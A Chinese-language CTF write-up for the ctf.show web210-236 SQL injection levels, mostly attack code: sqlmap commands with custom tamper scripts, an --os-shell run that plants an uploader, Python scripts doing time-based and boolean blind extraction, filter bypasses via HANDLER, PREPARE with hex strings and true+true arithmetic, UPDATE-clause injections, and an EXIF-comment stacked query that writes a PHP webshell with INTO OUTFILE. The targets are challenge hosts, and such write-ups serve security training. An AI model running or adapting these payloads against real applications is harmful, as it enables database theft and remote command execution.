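        elif ch == " " and not in_double and not in_single:
            out.append("\n")
            continue
        elif ch == "=":
            out.append("\nlike\n")
            continue
        out.append(ch)
    return "".join(out)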

210

//查询语句
//拼接sql语句查找指定ID用户
$sql = "select id,username,pass from ctfshow_user where id = '".$id."' limit 0,1;";

//返回逻辑
//对查询字符进行解密
// The id parameter arrives double-encoded: this undoes base64 -> reverse ->
// base64 -> reverse, i.e. the exact inverse of the encoding chain the 210.py
// tamper script below applies.  The decoded value is then concatenated into
// $sql without further handling.
function decode($id){
	return strrev(base64_decode(strrev(base64_decode($id))));
}
sqlmap -u 'http://e54d8397-3237-4685-878d-ad0dacd1a707.challenge.ctf.show/api/index.php' --referer=ctf.show --safe-url='http://e54d8397-3237-4685-878d-ad0dacd1a707.challenge.ctf.show/api/getToken.php' --safe-freq=1 --data='id=1' -p 'id' --method=PUT --headers='Content-Type: text/plain' --tamper '210.py' -v 3 --batch --dump
# 基于 base64encode.py 修改
#!/usr/bin/env python

from lib.core.convert import encodeBase64
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW  # NOTE(review): sqlmap tamper ordering; LOW presumably runs after higher-priority tampers — confirm in lib.core.enums

def dependencies():
    """Declare no external requirements (sqlmap tamper-script hook)."""
    return None

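def reverse(x):
    """Return the characters of *x* in reverse order, joined into a string.

    Equivalent to the original list/reverse/join dance; the original also
    computed ``x[::-1]`` first and threw the result away, which is dropped.

    Args:
        x: a string (any iterable of strings is accepted as before).
    Returns:
        The reversed text.
    """
    return ''.join(reversed(x))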

def tamper(payload, **kwargs):
    """Encode *payload* the way the target's decode() expects it.

    Applies reverse -> base64 -> reverse -> base64, each step undone in turn
    by the PHP ``strrev(base64_decode(strrev(base64_decode($id))))`` quoted
    above.  Uses the module-level ``reverse`` and sqlmap's ``encodeBase64``.

    Args:
        payload: the SQL fragment sqlmap is about to send.
        **kwargs: ignored; present for the tamper-script interface.
    Returns:
        The doubly encoded payload as text.
    """
    once = encodeBase64(reverse(payload), binary=False)
    return encodeBase64(reverse(once), binary=False)
from lib.core.compat import xrange
from lib.core.enums import PRIORITY
import base64
 
__priority__ = PRIORITY.LOW  # NOTE(review): sqlmap tamper ordering; LOW presumably runs after higher-priority tampers — confirm in lib.core.enums
 
def dependencies():
    """Declare no external requirements (sqlmap tamper-script hook)."""
    return None
 
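def tamper(payload, **kwargs):
    """Encode *payload* with the stdlib: reverse, base64, reverse, base64.

    Mirrors the PHP ``strrev(base64_decode(strrev(base64_decode($id))))``
    quoted above.  A falsy payload (None, '') is returned unchanged — the
    original raised TypeError on None, which sqlmap may pass.

    Args:
        payload: the SQL fragment sqlmap is about to send.
        **kwargs: ignored; present for the tamper-script interface.
    Returns:
        The doubly encoded payload as text.
    """
    if not payload:
        return payload
    inner = base64.b64encode(payload[::-1].encode())
    return base64.b64encode(inner[::-1]).decode()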

211

//查询语句
//拼接sql语句查找指定ID用户
$sql = "select id,username,pass from ctfshow_user where id = '".$id."' limit 0,1;";

//返回逻辑
//对查询字符进行解密
// Undo the double encoding of the id parameter (base64 -> reverse -> base64 ->
// reverse); the result goes straight into the concatenated $sql above.
function decode($id){
	return strrev(base64_decode(strrev(base64_decode($id))));
}
// Blocks only a literal space character.  Any other whitespace or a comment
// sequence is not covered, which is what the space2comment tamper relies on.
function waf($str){
	return preg_match('/ /', $str);
}
sqlmap -u 'http://5c35d42f-c886-46d8-a9f8-31b4d9a0bc83.challenge.ctf.show/api/index.php' --referer=ctf.show --safe-url='http://5c35d42f-c886-46d8-a9f8-31b4d9a0bc83.challenge.ctf.show/api/getToken.php' --safe-freq=1 --data='id=1' -p 'id' --method=PUT --headers='Content-Type: text/plain' --tamper 'space2comment.py,210.py' -v 3 --batch --dump
# 注意 tamper 脚本的使用顺序:先 space2comment.py 再 210.py

212

//拼接sql语句查找指定ID用户
$sql = "select id,username,pass from ctfshow_user where id = '".$id."' limit 0,1;";

//返回逻辑
//对查询字符进行解密
// Undo the double encoding of the id parameter (base64 -> reverse -> base64 ->
// reverse); the result goes straight into the concatenated $sql above.
function decode($id){
	return strrev(base64_decode(strrev(base64_decode($id))));
}
// Blocks a literal space or '*' (so the /**/ comment trick is out as well);
// other whitespace such as LF is still accepted.
function waf($str){
	return preg_match('/ |\*/', $str);
}
sqlmap -u 'http://9b2248e0-e6dc-4f65-85aa-f8c9a4ed6455.challenge.ctf.show/api/index.php' --referer=ctf.show --safe-url='http://9b2248e0-e6dc-4f65-85aa-f8c9a4ed6455.challenge.ctf.show/api/getToken.php' --safe-freq=1 --data='id=1' -p 'id' --method=PUT --headers='Content-Type: text/plain' --tamper '209,210' -v 3 --batch --dump

213

//拼接sql语句查找指定ID用户
$sql = "select id,username,pass from ctfshow_user where id = '".$id."' limit 0,1;";

//返回逻辑
//对查询字符进行解密
// Undo the double encoding of the id parameter (base64 -> reverse -> base64 ->
// reverse); the result goes straight into the concatenated $sql above.
function decode($id){
	return strrev(base64_decode(strrev(base64_decode($id))));
}
// Same filter as the previous level: a literal space or '*'.
function waf($str){
	return preg_match('/ |\*/', $str);
}
sqlmap -u 'http://739eab70-7d71-4452-927c-76140902a565.challenge.ctf.show/api/index.php' --referer=ctf.show --safe-url='http://739eab70-7d71-4452-927c-76140902a565.challenge.ctf.show/api/getToken.php' --safe-freq=1 --data='id=1' -p 'id' --method=PUT --headers='Content-Type: text/plain' --tamper '209,210'  --os-shell

which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
>

do you want sqlmap to further try to provoke the full path disclosure? [Y/n]

[19:50:59] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('/var/www/, /var/www/html, /var/www/htdocs, /usr/local/apache2/htdocs, /usr/local/www/data, /var/apache2/htdocs, /var/www/nginx-default, /srv/www/htdocs, /usr/local/var/www') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 4

#找到路径后sqlmap会上传一个能够上传其他文件的PHP文件,进而上传木马,在根目录找到了flag

时间盲注

214

#时间盲注
import requests
 
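url = 'http://fdbb6405-2a38-47ac-a0e5-f1b226d992b5.challenge.ctf.show/api/'
flag = ''

# Earlier rounds run with the same loop (kept for reference):
#   select group_concat(table_name) from information_schema.tables where table_schema=database()
#   select group_concat(column_name) from information_schema.columns where table_name="ctfshow_flagx"
payload = 'select group_concat(flaga) from ctfshow_flagx'

for pos in range(1, 46):
    # Binary search over ASCII 32..126 for the character at `pos`.  The only
    # observable is latency: the injected if() calls sleep(1) when the
    # character code is above `mid`, and the 1 s client timeout turns that
    # delay into an exception.
    lo, hi = 32, 126
    while lo < hi:
        mid = (lo + hi) // 2
        data = {
            'ip': f'if(ascii(substr(({payload}), {pos}, 1))>{mid},sleep(1), 1)',
            'debug': 0
        }
        try:
            requests.post(url, data=data, timeout=1)
        except requests.Timeout:
            # Only a timeout is evidence of sleep(1).  The original caught
            # every Exception, so a connection error was silently read as
            # "true" and corrupted the recovered value.
            lo = mid + 1
        else:
            hi = mid
    if lo == 32:
        # ascii('') is 0 one position past the end, so every probe is false
        # and the search bottoms out at 32: the value is complete.
        break
    flag += chr(lo)
    print(flag)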

215

#相比上题需要闭合单引号
import requests
 
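url = 'http://c3d0d3a1-d102-4cae-8e10-bf7afebe19c2.challenge.ctf.show/api/'
flag = ''

# Earlier rounds run with the same loop (kept for reference):
#   select group_concat(table_name) from information_schema.tables where table_schema=database()
#   select group_concat(column_name) from information_schema.columns where table_name="ctfshow_flagxc"
payload = 'select group_concat(flagaa) from ctfshow_flagxc'

for pos in range(1, 46):
    # Binary search over ASCII 32..126 for the character at `pos`; this level
    # sits inside a single-quoted value, hence the leading quote and the
    # trailing "and '1'='1" that re-closes it.  Latency is the only oracle.
    lo, hi = 32, 126
    while lo < hi:
        mid = (lo + hi) // 2
        data = {
            'ip': f"' or if(ascii(substr(({payload}), {pos}, 1))>{mid},sleep(1), 1) and '1'='1",
            'debug': '0'
        }
        try:
            requests.post(url, data=data, timeout=1)
        except requests.Timeout:
            # Only a timeout is evidence of sleep(1); the original's broad
            # `except Exception` read any network error as "true".
            lo = mid + 1
        else:
            hi = mid
    if lo == 32:
        # ascii('') is 0 past the end of the value: nothing more to read.
        break
    flag += chr(lo)
    print(flag)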

216

查询语句
where id = from_base64($id);
import requests
 
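url = 'http://8efafede-adba-4dff-8020-12393af13fb4.challenge.ctf.show/api/'
flag = ''

# Earlier rounds run with the same loop (kept for reference):
#   select group_concat(table_name) from information_schema.tables where table_schema=database()
#   select group_concat(column_name) from information_schema.columns where table_name="ctfshow_flagxcc"
payload = 'select group_concat(flagaac) from ctfshow_flagxcc'

for pos in range(1, 46):
    # Binary search over ASCII 32..126 for the character at `pos`.  The value
    # is wrapped in from_base64('...') server-side, so the probe closes that
    # call with a valid base64 token ('MQ==' is "1") first.  Latency is the
    # only oracle.
    lo, hi = 32, 126
    while lo < hi:
        mid = (lo + hi) // 2
        data = {
            'ip': f"'MQ==') or if(ascii(substr(({payload}), {pos}, 1))>{mid},sleep(1), 1",
            'debug': '0'
        }
        try:
            requests.post(url, data=data, timeout=1)
        except requests.Timeout:
            # Only a timeout is evidence of sleep(1); the original's broad
            # `except Exception` read any network error as "true".
            lo = mid + 1
        else:
            hi = mid
    if lo == 32:
        # ascii('') is 0 past the end of the value: nothing more to read.
        break
    flag += chr(lo)
    print(flag)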

217

//查询语句
where id = ($id);

//屏蔽危险分子
// Blocks the word "sleep" (case-insensitive) only; other CPU-heavy functions
// that produce the same measurable delay are not on the list.
function waf($str){
	return preg_match('/sleep/i',$str);
}

可以使用 benchmark 来替代 sleep。同样可以达到延迟时间的目的。

BENCHMARK(count,expr)
benchmark函数会重复计算expr表达式count次

但是一直跑可能会出错,所以可以加个 time.sleep(0.2) 休息一下。

import time
 
import requests
 
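url = 'http://39110013-bc10-4ec0-8831-30401b332be5.challenge.ctf.show/api/'
flag = ''

# Earlier rounds run with the same loop (kept for reference):
#   select group_concat(table_name) from information_schema.tables where table_schema=database()
#   select group_concat(column_name) from information_schema.columns where table_name="ctfshow_flagxccb"
payload = 'select group_concat(flagaabc) from ctfshow_flagxccb'

for pos in range(1, 46):
    # Binary search over ASCII 32..126 for the character at `pos`.  With
    # sleep() filtered, benchmark() provides the delay; the 0.5 s client
    # timeout turns it into an exception.
    lo, hi = 32, 126
    while lo < hi:
        mid = (lo + hi) // 2
        data = {
            'ip': f"1) or if(ascii(substr(({payload}), {pos}, 1))>{mid},benchmark(1000000,md5(1)), 1",
            'debug': '0'
        }
        try:
            requests.post(url, data=data, timeout=0.5)
        except requests.Timeout:
            # Only a timeout is evidence of the benchmark; the original's
            # broad `except Exception` read any network error as "true".
            lo = mid + 1
        else:
            hi = mid
        # Short pause so benchmark() calls still running server-side do not
        # pile up and slow the next probe into a false positive.
        time.sleep(0.2)
    if lo == 32:
        # ascii('') is 0 past the end of the value: nothing more to read.
        break
    flag += chr(lo)
    print(flag)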

218

//查询语句
where id = ($id);

//屏蔽危险分子
// Blocks "sleep" and "benchmark" (case-insensitive).  A delay can still be
// produced by an expensive query (e.g. a cross join over information_schema),
// which is what the scripts below use.
function waf($str){
	return preg_match('/sleep|benchmark/i',$str);
}

用笛卡尔积盲注

import time

import requests

# Probe template; the two `{}` slots are (position, threshold).  It is true
# when the character at `position` of the value has a code above `threshold`.
# Earlier rounds, with the results the author recorded:
#   tables  -> ctfshow_flagxc, ctfshow_info
#     "ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))>{}"
#   columns -> id, flagaac
#     "ascii(mid((select group_concat(column_name) from information_schema.columns where table_schema=database()),{},1))>{}"
payload = "ascii(mid((select flagaac from ctfshow_flagxc),{},1))>{}"

# Challenge endpoint (instance-specific host).
url = "http://a50e4405-bdf0-49c6-b928-361814cea706.challenge.ctf.show/api/"


def valid_payload(p: str) -> bool:
    data = {
        "debug": 0,
        "ip": f"if({p},(select count(*) from information_schema.columns A,information_schema.tables B"
              f",information_schema.tables C),1) "
    }
    time_s = time.time()
    _ = requests.post(url, data=data)
    time_e = time.time()
    # 改用手动计时防止多次没跑完的笛卡尔积叠加卡死影响注入
    return time_e-time_s > 2


index = 1
result = ""

while True:
    start = 32
    end = 127
    while not(abs(start - end) == 1 or start == end):
        everage = (start + end) // 2
        if valid_payload(payload.format(index, everage)):
            start = everage
        else:
            end = everage
    if end < start:
        end = start
    if chr(end) == "!":
        break
    result += chr(end)
    print(f"[*] result: {result}")
    index += 1
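import requests
url = "http://a50e4405-bdf0-49c6-b928-361814cea706.challenge.ctf.show/api/"

# Candidate characters, tried in this order for every position.
strr = '_1234567890{}-qazwsxedcrfvtgbyhnujmikolp,'
# Earlier stages of the same attack, kept for reference:
# payload = "select table_name from information_schema.tables where table_schema=database() limit 0,1"
# payload = "select column_name from information_schema.columns where table_name='ctfshow_flagxc' limit 1,1"
payload = "select flagaac from ctfshow_flagxc"
res = ""
cnt = 1
while True:
    print(cnt)
    for i in strr:
        # A correct guess makes the server evaluate the Cartesian product
        # and exceed the client timeout; a wrong guess returns quickly.
        data = {
            'ip': f"1) or if(substr(({payload}),{cnt},1)='{i}',(SELECT count(*) FROM information_schema.tables A, information_schema.schemata B, information_schema.schemata D, information_schema.schemata E, information_schema.schemata F,information_schema.schemata G, information_schema.schemata H),1",
            'debug': '1'
        }
        try:
            requests.post(url, data=data, timeout=0.5)
        except requests.exceptions.Timeout:
            # Only a timeout counts as a hit; other network errors propagate
            # instead of being mistaken for a matching character.
            res += i
            print('[*]' + res)
            cnt += 1
            break
    else:
        # No candidate timed out: the string has ended (or holds a character
        # outside strr).  Previously this re-probed the same position forever.
        break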

219

//查询语句
where id = ($id);

//屏蔽危险分子
/**
 * Challenge-side filter quoted from the web219 target.
 *
 * Rejects the input when it contains "sleep", "benchmark" or "rlike"
 * (case insensitive). The Cartesian-product delay used by the writeup
 * needs none of these keywords, so the denylist does not stop it.
 */
function waf($str){
	return preg_match('/sleep|benchmark|rlike/i',$str);
}   
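import requests
url = "http://167c24a6-0863-4d25-9301-18a37ff55e00.challenge.ctf.show/api/"

# Candidate characters, tried in this order for every position.
strr = "_1234567890{}-qazwsxedcrfvtgbyhnujmikolp,"
# Earlier stages of the same attack, kept for reference:
# payload = "select table_name from information_schema.tables where table_schema=database() limit 0,1"
# payload = "select column_name from information_schema.columns where table_name='ctfshow_flagxca' limit 1,1"
payload = "select flagaabc from ctfshow_flagxca"
cnt = 1
res = ""
while True:
    print(cnt)
    for i in strr:
        # One more schemata table than web218 and a longer timeout: the
        # product must be slow enough to clearly exceed 2 s on a hit.
        data = {
            'ip': f"1) or if(substr(({payload}),{cnt},1)='{i}',(SELECT count(*) FROM information_schema.tables A, information_schema.schemata B, information_schema.schemata D, information_schema.schemata E, information_schema.schemata F,information_schema.schemata G, information_schema.schemata H, information_schema.schemata I),1",
            'debug': '1'
        }
        try:
            requests.post(url, data=data, timeout=2)
        except requests.exceptions.Timeout:
            # Only a timeout counts as a hit; other network errors propagate
            # instead of being mistaken for a matching character.
            res += i
            print('[*]' + res)
            cnt += 1
            break
    else:
        # No candidate timed out: end of string (or a character outside
        # strr).  Previously this re-probed the same position forever.
        break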

220

//查询语句
where id = ($id);

//屏蔽危险分子
/**
 * Challenge-side filter quoted from the web220 target.
 *
 * Adds the usual character-extraction helpers (ascii, hex, concat,
 * concat_ws, mid, substr) to the denylist. LEFT() is not listed, which is
 * why the writeup compares a growing prefix with left() instead of a
 * single character with substr().
 */
function waf($str){
	return preg_match('/sleep|benchmark|rlike|ascii|hex|concat_ws|concat|mid|substr/i',$str);
}
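import requests
url = "http://e47ee4e7-c885-4e83-9b94-9a98c7698afd.challenge.ctf.show/api/"

# Candidate characters, tried in this order for every position.
strr = "_1234567890{}-qazwsxedcrfvtgbyhnujmikolp"
# Earlier stages of the same attack, kept for reference:
# payload = "select table_name from information_schema.tables where table_schema=database() limit 0,1"
# payload = "select column_name from information_schema.columns where table_name='ctfshow_flagxcac' limit 1,1"
payload = "select flagaabcc from ctfshow_flagxcac"
cnt = 1
res = ""
while True:
    print(cnt)
    for i in strr:
        # substr/mid are filtered, so compare the whole prefix with left():
        # the candidate is the recovered prefix plus one more character.
        candidate = res + i
        data = {
            'ip': f"1) or if(left(({payload}),{cnt})='{candidate}',(SELECT count(*) FROM information_schema.tables A, information_schema.schemata B, information_schema.schemata D, information_schema.schemata E, information_schema.schemata F,information_schema.schemata G, information_schema.schemata H),1",
            'debug': '1'
        }
        try:
            requests.post(url, data=data, timeout=0.5)
        except requests.exceptions.Timeout:
            # Only a timeout counts as a hit; other network errors propagate
            # instead of being mistaken for a matching prefix.
            res = candidate
            print('[*]' + res)
            cnt += 1
            break
    else:
        # No candidate timed out: end of string (or a character outside
        # strr).  Previously this re-probed the same position forever.
        break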

221

//分页查询
$sql = select * from ctfshow_user limit ($page-1)*$limit,$limit;

利用 procedure analyse() 函数(本意是分析各列取值并给出字段类型优化建议)。注意 PROCEDURE ANALYSE() 自 MySQL 5.7.18 起被弃用、8.0 中已移除,此方法只对旧版本有效。

procedure analyse(max_elements,max_memory)
max_elements
指定每列非重复值的最大值,当超过这个值的时候,MySQL不会推荐enum类型。
max_memory
analyse()为每列找出所有非重复值所采用的最大内存大小。

利用 ExtractValue 的报错,获得数据库名。

ExtractValue(xml_frag, xpath_expr)

/api/?page=1&limit=1 procedure analyse(extractvalue(1,concat(0x7e,database(),0x7e)),1)

222

//查询语句
$sql = select * from ctfshow_user group by $username;

开始尝试的是group by报错注入,但是注不出来,最后还是用的盲注。

group by 后面拼的是 if(条件,username,'a'):条件成立时按 username 分组,返回正常的用户数据(响应里出现 userAUTO);条件不成立时按常量 'a' 分组,返回的结果不同。据此就能判断 if 里的条件是否成立,实现布尔盲注。

import requests

url = 'http://ad25ea25-707b-4d0b-aa39-7e30a542c917.challenge.ctf.show/api/'
flag = ''
i = 0

# web222: boolean-based blind injection through the GROUP BY column.  When the
# if() condition holds the query groups by username and the normal listing
# (containing "userAUTO") comes back; otherwise it groups by the constant 'a'.
while True:
    i += 1
    # Binary search for the ASCII value of the i-th character.
    low, high = 32, 127
    while low < high:
        mid = (low + high) >> 1
        # Earlier stages of the same attack, kept for reference:
        # payload = 'select group_concat(table_name) from information_schema.tables where table_schema=database()'
        # payload = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flaga'"
        payload = 'select concat(flagaabc) from ctfshow_flaga'
        params = {'u': f"if(ascii(substr(({payload}),{i},1))>{mid},username,'a')"}
        page = requests.get(url, params=params).text
        if "userAUTO" in page:
            low = mid + 1
        else:
            high = mid
    if low == 32:
        # Never moved off the lower bound: no character here, flag complete.
        break
    flag += chr(low)
    print(flag)

223

//查询语句
$sql = select * from ctfshow_user group by $username;

//TODO:很安全,不需要过滤
//用户名不能是数字

在上一题的基础上加了过滤,用户名不能包含数字。可以使用 true 来绕过:MySQL 里 true 参与数值运算时等于 1,所以 true+true 就是 2,任意数字都可以用若干个 true 相加表示。

import requests 
# web223 target; note the doubled slash in the path is what the author used.
url: str = 'http://5c2a899b-dfaa-42fa-84cb-7542c7f597de.challenge.ctf.show//api/'
# Characters recovered so far and the 1-based position being probed.
flag: str = ''
i: int = 0

def numTrue(number):
    """Spell the integer *number* without digits, as ``true+true+...``.

    The web223 filter rejects digits in the username, but MySQL treats
    ``true`` as 1 in arithmetic, so a sum of *number* ``true`` terms stands
    in for the literal.  Values below 1 yield a single ``true`` (same as
    the original loop, whose range was empty in that case).
    """
    return 'true' + '+true' * (number - 1)

while True:
    i += 1
    # Binary search for the ASCII value of the i-th character.
    low, high = 32, 127
    while low < high:
        mid = (low + high) >> 1
        # Earlier stages of the same attack, kept for reference:
        # payload = 'select group_concat(table_name) from information_schema.tables where table_schema=database()'
        # payload = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagas'"
        payload = 'select concat(flagasabc) from ctfshow_flagas'
        # Every numeric literal goes through numTrue() because the filter
        # bans digits in the username.
        condition = f"if(ascii(substr(({payload}),{numTrue(i)},{numTrue(1)}))>{numTrue(mid)},username,'a')"
        page = requests.get(url, params={'u': condition}).text
        if "userAUTO" in page:
            low = mid + 1
        else:
            high = mid
    if low == 32:
        # Never moved off the lower bound: no character here, flag complete.
        break
    flag += chr(low)
    print(flag)

224

提示:

不需要爆破、扫描
没有源码泄露
登陆不上去找txt

考点:Recon、EXIF、SQLi

img

fuzz之后发现无法注入,在robots.txt找到hint:

User-agent: *
Disallow: /pwdreset.php

然后在这个 pwdreset 页面可以重置密码,直接重置一下密码然后登录就可以了(fuzz 这个重置密码接口也没有找到注入点),登录之后发现是上传:

img

测试发现,不管是什么文件名,最后都成为了md5.zip的格式,点击即可下载,虽然只是简单重命名并没有进行zip压缩

经过接近30min的测试,都没有bypass这个zip后缀,然后我对同一个包进行重放发现也会生成多个不同文件名的文件,所以md5应该是直接哈希了和时间有关的东西或者是随机数。

除此之外,还会检测文件的类型以及换行,并以列表形式显示出来:

img

简单fuzz之后就应该知道不是个上传getshell题目,结合题目名考虑还是注入。之前xctf有过文件名注入的题目,将文件名insert插入数据库,就造成了注入,比如可以使用类似这样Payload的报错注入:

1' or updatexml() or '1

我猜测本题目可能也是这样考的,把源文件名存进数据库然后保存成md5.zip,但是测试了很多种不同的payload组合,都是失败了,所以考点可能也不在这里。

之后我注意到了filetype和换行,对于换行这个东西没有什么想法,filetype的话很可能是存入数据库的,如果能够欺骗PHP的文件类型检测,就可以插入SQL语句造成注入了,问题在于如何做到,以及此方法是否可行都是未知数

后来发现,它很有可能是使用了finfo类下的file()方法进行检测才输出了这样的结果,然而查了好久也没查到有相关的信息:

img

然后我决定去手撕PHP的C源码,看到不是特别明白这里就不说了,但是发现这个file()方法可以检测图片的EXIF信息,而EXIF信息中有一个comment字段,相当于图片注释,而finfo->file()正好能够输出这个信息,如果上面的假设成立,这就可以造成SQL注入

然后根据之前xctf的那个文件名注入的题目的sql语句,猜测本题目的语句应该大概是这样的:

insert into column(name, type, lineFeed) values ($filename, $filetype, $filelinefeed);

所以需要先构造这个insert语句闭合。insert不能联合查询什么的,不过也不用去专门构造Payload,只要堆叠注入就可以了。

因为filelist里面是输出的文件信息,应该是上传时候insert进去的,然而对insert堆叠并不能更新数据库信息,这样就没有回显,无回显的话只能靠延时了,先弄个延时测试一下吧

之后就是下一个问题,如何更新exif信息?可以使用exiftool工具,Payload:

exiftool -overwrite_original -comment="y1ng\"');select if(1,sleep(20),sleep(20));--+" y1ng.jpg

之后直接file命令就可以看到comment:

img

当然用EXIF在线查看器也可以:

img

之后就是上传,如果可以造成注入,那么应该就可以直接延时,上传发现果然延时成功了,说明可以注入

现在是注入点找到了,也没有任何过滤,下一步做什么?时间盲注?根本不现实,因为一个Payload代表这要生成一次新的图片+上传一个新的图片,过于复杂,所以考虑直接getshell,Payload:

exiftool -overwrite_original -comment="y1ng\"');select 0x3C3F3D60245F504F53545B305D603B into outfile '/var/www/html/1.php';--+"

其中select后面的16进制转一下字符串为

<?=`$_POST[0]`;

因为我最开始是直接把一句话木马转 16 进制然后用了这个 Payload,然而 outfile 后面的路径到 /v 就被截断了,推测是 comment 经 finfo 读出后存入数据库的那个字段有长度限制,Payload 太长被截掉了:

img

所以用一个尽量短的php脚本,更新exif,上传,即可直接getshell:

img

225

//查询语句
$sql = "select id,username,pass from ctfshow_user where username = '{$username}';";

if(preg_match('/file|into|dump|union|select|update|delete|alter|drop|create|describe|set/i',$username)){
	die(json_encode($ret));
}

方法一:handler

过滤了 select ,可以使用 handler 来进行查询。

mysql除可使用select查询表中的数据,也可使用handler语句,这条语句使我们能够一行一行的浏览一个表中的数据,不过handler语句并不具备select语句的所有功能。它是mysql专用的语句,并没有包含到SQL标准中。 

通过 HANDLER tbl_name OPEN 打开一张表,无返回结果,实际上我们在这里声明了一个名为 tbl_name 的句柄。

通过HANDLER tbl_name READ FIRST获取句柄的第一行,通过READ NEXT依次获取其它行。最后一行执行之后再执行NEXT会返回一个空的结果。

没有过滤show

?username=1';show tables;

用handler读取

?username=1';handler ctfshow_flagasa open;handler ctfshow_flagasa read first;

方法二:预处理

利用 concat 在服务端把被过滤的关键字拼出来再交给 PREPARE 执行,关键字本身不出现在请求里,因此能绕过基于关键字的黑名单;前提是存在堆叠注入(能执行多条语句)。之后把 database() 替换为想要执行的语句即可,别忘了加空格。对于不知道啥是预处理的可以看看我这篇博客,SQL注入随便注(三种姿势)

username=1';PREPARE a from concat('s','elect', ' database()');EXECUTE a;

当然concat(char(115,101,108,101,99,116)也可以代替select

226、228-230

//查询语句
$sql = "select id,username,pass from ctfshow_user where username = '{$username}';";

if(preg_match('/file|into|dump|union|select|update|delete|alter|drop|create|describe|set|show|\(/i',$username)){
	die(json_encode($ret));
}
?username=';PREPARE a from 0x73686F77207461626C6573;EXECUTE a;
0x73686F77207461626C6573 => show tables

?username=';PREPARE a from 0x73656c656374202a2066726f6d2063746673685f6f775f666c616761733b;EXECUTE a;
0x73656c656374202a2066726f6d2063746673685f6f775f666c616761733b => select * from ctfsh_ow_flagas;

?username=1';handler ctfsh_ow_flagas open;handler ctfsh_ow_flagas read first;

227

$sql = "select id,username,pass from ctfshow_user where username = '{$username}';";

if(preg_match('/file|into|dump|union|select|update|delete|alter|drop|create|describe|set|show|db|\,/i',$username)){
	die(json_encode($ret));
}

查看MySQL的 Stored Procedure (被差劲地翻译为 存储过程,我更愿意称之为 "存储好了的程序")。

MySQL 5.0 版本开始支持 Stored Procedure 。

Stored Procedure 是一种在数据库中存储复杂程序,以便外部程序调用的一种数据库对象。

Stored Procedure 是为了完成特定功能的SQL语句集,经编译创建并保存在数据库中,用户可通过指定 Stored Procedure 的名字并给定参数(需要时)来调用执行。

Stored Procedure 思想上很简单,就是数据库 SQL 语言层面的代码封装与重用。

在mysql中, Stored Procedure 和函数的信息存储在 information_schema 数据库下的 Routines 表中,可以通过查询该表的记录来查询 Stored Procedure 和函数的信息。

?username=1';PREPARE a from 0x73656c656374202a2066726f6d20696e666f726d6174696f6e5f736368656d612e726f7574696e6573;EXECUTE a;

0x73656c656374202a2066726f6d20696e666f726d6174696f6e5f736368656d612e726f7574696e6573 => select * from information_schema.routines

可直接看到flag,也可以知道函数名,通过 call getFlag(); 获得flag

update

231

$sql = "update ctfshow_user set pass = '{$password}' where username = '{$username}';";

尝试输入

password=user',username=database() where 1=1#&username=1

此时的SQL语句就变为了:

update ctfshow_user set pass = 'user',username=database() where 1=1#' where username = '1';

然后到update.php中发现username全变为了数据库名。

之后就可以逐个查表名,字段名和字段内容了。

password=user',username=(select group_concat(table_name) from information_schema.tables where table_schema=database()) where 1=1#&username=1

password=user',username=(select group_concat(column_name) from information_schema.columns where table_name='flaga') where 1=1#&username=1

password=user',username=(select flagas from flaga) where 1=1#&username=1

232

$sql = "update ctfshow_user set pass = md5('{$password}') where username = '{$username}';";

就是多了个md5函数,闭合一下括号就可以了。

password=user'),username=(select group_concat(table_name) from information_schema.tables where table_schema=database()) where 1=1#&username=1

password=user'),username=(select group_concat(column_name) from information_schema.columns where table_name='flagaa') where 1=1#&username=1

password=user'),username=(select flagass from flagaa) where 1=1#&username=1

233

$sql = "update ctfshow_user set pass = '{$password}' where username = '{$username}';";

这道题 SQL 语句和 231 一样,但是不管输入什么都提示查询失败、没有回显,所以使用时间盲注。注意 where 后的 or 条件会对 ctfshow_user 的每一行求值,sleep(0.05) 按行数累加,总延迟 = 行数 × 0.05 秒,客户端 timeout 要设在这个总时长之内才能区分真假。

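import requests
url = "http://a5df7cce-87d5-4270-b8e5-0c61d0307a39.challenge.ctf.show/api/?page=1&limit=10"
result = ""
i = 0

# web233: time-based blind injection through the UPDATE's WHERE clause.  The
# "or if(...)" condition is evaluated per row, so sleep(0.05) accumulates over
# the whole table; the 0.9 s timeout must sit below rows * 0.05 s.
while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        # Earlier stages of the same attack, kept for reference:
        # payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
        # payload = "select column_name from information_schema.columns where table_name='flag233333' limit 1,1"
        payload = "select flagass233 from flag233333"
        data = {
            'username': f"1' or if(ascii(substr(({payload}),{i},1))>{mid},sleep(0.05),1)#",
            'password': '4'
        }
        try:
            requests.post(url, data=data, timeout=0.9)
        except requests.exceptions.Timeout:
            # Only a timeout means the sleep branch ran (char > mid); other
            # network errors propagate instead of being recorded as a bit.
            head = mid + 1
        else:
            tail = mid
    if head != 32:
        result += chr(head)
    else:
        # Never moved off the lower bound: no character here, flag complete.
        break
    # Fixed: the original had an unclosed parenthesis here (SyntaxError).
    print(result)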

234

$sql = "update ctfshow_user set pass = '{$password}' where username = '{$username}';";

原来的语句是

$sql = "update ctfshow_user set pass = '{$password}' where username = '{$username}';";

但是传入单引号后

$sql = "update ctfshow_user set pass = '\' where username = 'username';";

这样pass里面的内容就是' where username =,接下来username里面的参数就是可以控制的了

username=,username=(select group_concat(table_name) from information_schema.columns where table_schema=database())-- &password=\

username=,username=(select group_concat(column_name) from information_schema.columns where table_name=0x666c6167323361)-- &password=\

username=,username=(select flagass23s3 from flag23a)-- &password=\

235

$sql = "update ctfshow_user set pass = '{$password}' where username = '{$username}';";
//过滤 or ' 

information_schema 没法用了,因为过滤的 or 会匹配到 information_schema 里的 "or" 子串。可以改用 mysql.innodb_table_stats 取表名(只包含 InnoDB 表,且需要当前用户对 mysql 库有读权限):

username=,username=(select group_concat(table_name) from mysql.innodb_table_stats where database_name=database())-- - &password=\

# 无列名注入
username=,username=(select b from (select a,b,c union select * from flag23a1 limit 1,1)d)-- &password=\

236

$sql = "update ctfshow_user set pass = '{$password}' where username = '{$username}';";

// 过滤 or ' flag

// 估计是结果过滤了flag,但这儿flag格式是ctfshow{}...
// 预计是编码绕过对返回数据的过滤
